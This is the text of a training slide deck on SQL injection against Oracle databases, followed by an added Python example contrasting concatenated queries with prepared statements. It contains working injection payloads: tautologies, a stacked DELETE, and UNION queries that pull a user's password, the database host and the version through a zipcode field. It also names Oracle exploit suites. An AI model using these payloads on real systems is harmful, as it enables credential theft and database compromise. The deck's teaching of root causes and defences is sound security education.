Who's Afraid of SQL Injection?!
Mike Kölbl, Sonja Klausburg, Siegfried Goeschl
http://xkcd.com/327/
What Is SQL Injection?
Incorrectly validated or non-validated string literals are concatenated into a dynamic SQL statement and are interpreted as code by the SQL engine.
Why SQL Injection?
Get access to a different user account
Find data you are not allowed to see
Become a DBA without a job promotion
Infiltrate other backend servers, assuming you are a really bad guy
Categories of Attacks
SQL Manipulation
Code Injection
Function Call Injection
Buffer Overflows
SQL Manipulation
SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword'
SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword' or 'a' = 'a'
The WHERE clause is true for every row
SQL Manipulation
SELECT product_name FROM all_products WHERE product_name like '%Chairs%'
SELECT product_name FROM all_products WHERE product_name like '%Chairs' UNION SELECT username FROM dba_users WHERE username like '%'
The SQL statement now returns rows from another table
Code Injection
SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword';
SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword'; DELETE FROM users WHERE username = 'admin';
Does not work with Oracle (easily)...
Function Call Injection
SELECT TRANSLATE('user input', '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789') FROM dual;
SELECT TRANSLATE('' || UTL_HTTP.REQUEST('http://192.168.1.1/') || '', '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789') FROM dual;
UTL_HTTP.REQUEST takes a URL as its argument and returns up to the first 2000 bytes of data retrieved from that URL
Are You Afraid of SQL Injection?!
You'd Better Be
First Contact
'; --
Hello World
' UNION SELECT 1,0,'','','','Hello World','','','','','','','','','','','' FROM DUAL WHERE 1=1 OR 1='
Password Helper
' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('mkpe9r') OR 1='
Password Helper
The statement as the application executes it, with the payload landing in the zipcode literal:
select table_x_site_search.x_site_objid, x_bo_status, x_bo_x_sales_segment,
  x_bo_org_id, x_b_x_ban_id, x_company_name, x_a_address, x_a_zipcode, x_a_city,
  x_ctry_name, x_ctry_x_iso_code_2l, x_b_x_firmenbuchnummer, x_b_x_uid_number,
  x_e_first_name, x_e_last_name, x_e_e_mail, x_user_login_name
from table_x_site_search, table_bus_org
where table_x_site_search.x_bo_org_id = table_bus_org.org_id
  and x_s_company_name like 'MO%'
  and x_ctry_x_iso_code_2l = 'AT'
  and upper(x_a_s_address) like 'ER%'
  and x_a_zipcode = '' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('MKPE9R') OR 1=''
  and rownum <= 200
DB Host Lookup
' UNION SELECT 1,0,'','','',S.MACHINE,'','','','','','','','','','','' FROM V$SESSION S, V$PROCESS P WHERE P.SPID = S.PROCESS AND MACHINE IS NOT NULL OR 1='
Get Oracle Version
' UNION SELECT 1,0,'','','',VERSION,'','','','','','','','','','','' FROM DBA_REGISTRY WHERE COMP_ID = 'CATALOG' OR 1='
Oracle Cheat Sheet
List users and password hashes; checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
List all databases, tables and columns
Local file access using UTL_FILE
Make DNS requests
Cool Oracle Exploits
raptor_oraextproc.sql: directory traversal vulnerability in extproc
raptor_oraexec.sql: exploitation suite for Oracle written in Java, to read/write files and execute OS commands
raptor_orafile.sql: file system access suite for Oracle based on the utl_file package, to read/write files
Root Cause Analysis
Affects CUSI I29 and I30-dev
RegExp validation for PLZ is broken
Input field is not truncated
No SQL escaping of query parameter
Literal SQL statement is used
Passwords are not always encrypted
How To Avoid
Prepared statements
Test for SQL vulnerability
Code reviews
Think about security before someone else does it for you
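An added example, not from the slides: the concatenated login query from the SQL Manipulation slide next to its prepared-statement form, plus the strict PLZ check the Root Cause Analysis slide says was missing. It assumes an in-memory SQLite database standing in for Oracle (bind variables work the same way with Oracle's ':name' placeholders) and a constructed users table with two rows.

```python
import re
import sqlite3

def setup_db() -> sqlite3.Connection:
    """Constructed sample data (not from the talk): two users, one a DBA."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("bob", "mypassword", "user"), ("admin", "s3cret", "dba")])
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Literal SQL built by string concatenation: the defect the slides describe."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username +
           "' and password = '" + password + "'")
    return conn.execute(sql).fetchall()

def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Prepared statement: the values are bound, never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchall()

# Assumption: an Austrian PLZ is exactly four digits; anything else is rejected.
PLZ_RE = re.compile(r"^[0-9]{4}$")

def valid_plz(plz: str) -> bool:
    """Allow-list check with an implicit length bound, applied before the value
    reaches any query (defence in depth on top of parameter binding)."""
    return bool(PLZ_RE.match(plz))

def demo() -> dict:
    """Run the slide's own test input through both query variants."""
    conn = setup_db()
    probe = "' or 'a' = 'a"   # the tautology from the SQL Manipulation slide
    return {
        "vulnerable_rows": len(login_vulnerable(conn, "bob", probe)),  # every row
        "safe_rows": len(login_safe(conn, "bob", probe)),              # no match
        "safe_ok": len(login_safe(conn, "bob", "mypassword")),          # real login
        "plz_ok": valid_plz("1010"),
        "plz_rejected": valid_plz("' UNION SELECT 1,0,'"),
    }

if __name__ == "__main__":
    print(demo())
```

The vulnerable variant returns both users for the probe, the bound variant returns none, and the PLZ check refuses the injection string before a query is ever built.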
Why would this not happen to you?!
Questions and Answers
Resources
http://www.net-security.org/dl/articles/integrigyintrotosqlinjectionattacks.pdf
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/
http://www.0xdeadbeef.info/
http://www.red-database-security.com/exploits/oracle_10g_exploits.html